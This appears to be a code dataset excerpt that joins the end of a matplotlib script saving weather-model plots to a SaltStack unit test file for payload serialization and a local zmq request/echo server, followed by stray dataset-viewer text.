# cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_%s_and_%s_%s_hPa_and_geop_height_%s' % (experiment_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
#fig.savefig('%s/%s_notitle.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
plt.title('%s UTC' % (h))
fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import Salt libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import MockWraps
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, patch
# Import salt libs
import salt.payload
from salt.utils.odict import OrderedDict
import salt.exceptions
# Import 3rd-party libs
import msgpack
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
with patch('msgpack.version', (0, 1, 13)):
msgpack.dumps = MockWraps(
msgpack.dumps, 1, TypeError('ODict TypeError Forced')
)
payload = salt.payload.Serial('msgpack')
idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Class to set up zmq echo socket
'''
def echo_server():
'''
A server that echos the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
Test creation, send/rect
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
# subtle bug in zmq wherein a timeout=0 actually exceutes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
# test a regular send afterwards (to make sure sockets aren't in a twist
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.